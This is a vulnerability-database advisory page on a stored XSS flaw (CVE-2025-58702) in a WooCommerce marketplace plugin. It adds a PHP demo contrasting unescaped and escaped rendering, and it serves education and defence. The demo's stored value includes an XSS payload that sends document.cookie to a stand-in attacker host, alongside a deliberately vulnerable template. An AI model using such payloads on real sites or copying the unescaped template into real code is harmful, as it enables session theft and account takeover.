VYPR
Medium severity · CVSS 6.5 · NVD Advisory · Published Sep 22, 2025 · Updated Apr 23, 2026

CVE-2025-58702

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebWizards MarketKing (marketking-multivendor-marketplace-for-woocommerce) allows Stored XSS. This issue affects MarketKing: from n/a through 2.0.92 (inclusive).

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Stored XSS in the MarketKing plugin for WooCommerce (≤ 2.0.92) allows authenticated attackers with subscriber-level access to store scripts that later execute in other users' browsers.

Vulnerability

Overview

CVE-2025-58702 is a Stored Cross-Site Scripting (XSS) vulnerability in the MarketKing multivendor marketplace plugin for WooCommerce, affecting all versions up to and including 2.0.92. The flaw stems from improper neutralization of user-supplied input during web page generation: content submitted by an authenticated user with subscriber-level privileges is stored and later rendered into a page without context-appropriate escaping, so the attacker can inject arbitrary JavaScript or HTML that executes when the page is viewed. The advisory does not identify the specific field or template involved. [1]

Exploitation

Details

Exploitation requires that the attacker has at least a subscriber account on the WordPress site where the vulnerable plugin is active. The attacker can then submit malicious payloads through fields or inputs that the plugin stores and later displays to other users. Successful exploitation still depends on user interaction, which is reflected in the CVSS score: a victim, such as a shopper browsing the marketplace or an administrator reviewing vendor content, must load the page on which the stored payload is rendered, at which point the script executes in the context of the victim's browser session. [1]
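The following is an added example, not MarketKing code, that illustrates the pattern described in the Overview and Exploitation paragraphs above: a free-text value saved by a low-privilege account is interpolated into HTML unescaped, and the same template is shown hardened with context-aware output escaping. The field names (`store_name`, `tagline`), the markup, the payloads and the `esc_html()`/`esc_attr()` stand-ins are assumptions made for the demo; the advisory does not disclose the affected field, and WordPress supplies the real escaping functions inside a plugin.

```php
<?php
// Added example, not MarketKing code: the generic stored-XSS pattern the advisory
// describes (CWE-79, improper neutralization during page generation), next to the
// context-aware output escaping that neutralizes it. Field names, markup and
// stored values are assumptions; the advisory does not name the affected field.

// Stand-ins for the WordPress escaping API so this file runs under plain `php`
// outside WordPress. Inside a plugin the real esc_html()/esc_attr() already exist
// and these guards are skipped (the real ones also normalise existing entities).
if (!function_exists('esc_html')) {
    function esc_html(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Constructed "database row": a vendor profile saved by a subscriber-level account.
// The first value breaks out of an attribute; the second needs no <script> tag at all.
function attacker_controlled_profile(): array {
    return [
        'store_name' => 'Acme Goods"><script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>',
        'tagline'    => '<img src=x onerror="alert(document.domain)">',
    ];
}

// Vulnerable rendering: stored values interpolated straight into HTML.
// Whoever loads the store page, shopper or administrator, runs the stored script.
function render_vendor_card_vulnerable(array $p): string {
    return '<div class="vendor" data-store="' . $p['store_name'] . '">'
         . '<h2>' . $p['store_name'] . '</h2>'
         . '<p>' . $p['tagline'] . '</p>'
         . '</div>';
}

// Hardened rendering: escape for the exact output context at the point of output,
// esc_attr() inside attribute values and esc_html() for text nodes. Escaping on
// output (not only on save) also covers rows written before the fix or via other paths.
function render_vendor_card_safe(array $p): string {
    return '<div class="vendor" data-store="' . esc_attr($p['store_name']) . '">'
         . '<h2>' . esc_html($p['store_name']) . '</h2>'
         . '<p>' . esc_html($p['tagline']) . '</p>'
         . '</div>';
}

// Crude check used only to make the difference visible in this demo (not a WAF rule):
// is there a live <script> tag, or an on*= event handler inside an actual tag?
function contains_active_content(string $html): bool {
    return (bool) preg_match('/<script\b|<[a-z][^>]*\bon[a-z]+\s*=/i', $html);
}

if (PHP_SAPI === 'cli') {
    $profile = attacker_controlled_profile();
    $rendered = [
        'vulnerable' => render_vendor_card_vulnerable($profile),
        'safe'       => render_vendor_card_safe($profile),
    ];
    foreach ($rendered as $label => $html) {
        printf("%-10s active content: %s\n%s\n\n",
            $label, contains_active_content($html) ? 'YES' : 'no', $html);
    }
}
```

Run with `php stored-xss-demo.php`: the vulnerable card reports active content and the safe card does not. Two points carry over to a real fix: escape at output time for the specific context (attribute vs. text node vs. URL), because sanitizing only on save leaves already-stored rows and other write paths exposed; and where a field must legitimately allow limited HTML (a vendor description, for instance), use an allow-list filter such as WordPress's `wp_kses_post()` rather than trusting the stored markup.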

Impact

If exploited, an attacker could execute arbitrary scripts in the browsers of visitors or administrators, leading to potential consequences such as session hijacking, defacement, redirection to malicious sites, or theft of sensitive information displayed on the page. Because marketplace pages are viewed both by shoppers and by higher-privileged vendors and administrators, a payload stored by a subscriber can reach sessions with far more authority than the attacker's own, which is the usual path from stored XSS to account takeover. The CVSS v3 base score of 6.5 (Medium) reflects the need for authenticated access and user interaction, yet the impact on confidentiality and integrity is significant in a marketplace context. [1]

Mitigation

The plugin vendor has released version 2.1.00, which contains the fix. Users are strongly advised to update immediately. For Patchstack users, enabling auto-updates for vulnerable plugins is recommended. If an immediate update is not possible, apply temporary workarounds such as restricting subscriber accounts (for example, disabling open registration or limiting what low-privilege accounts may submit) or using a web application firewall to filter XSS attempts. Note that a WAF only inspects new requests: payloads already stored before a rule is deployed will still render, so review existing vendor-submitted content as well. No evidence of active exploitation in the wild has been reported at the time of publication. [1]

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 2

Patches: 0 (no patch commits indexed yet; the fixed release is noted under Mitigation)

References: 1

News mentions: 0 (no linked articles in our index yet)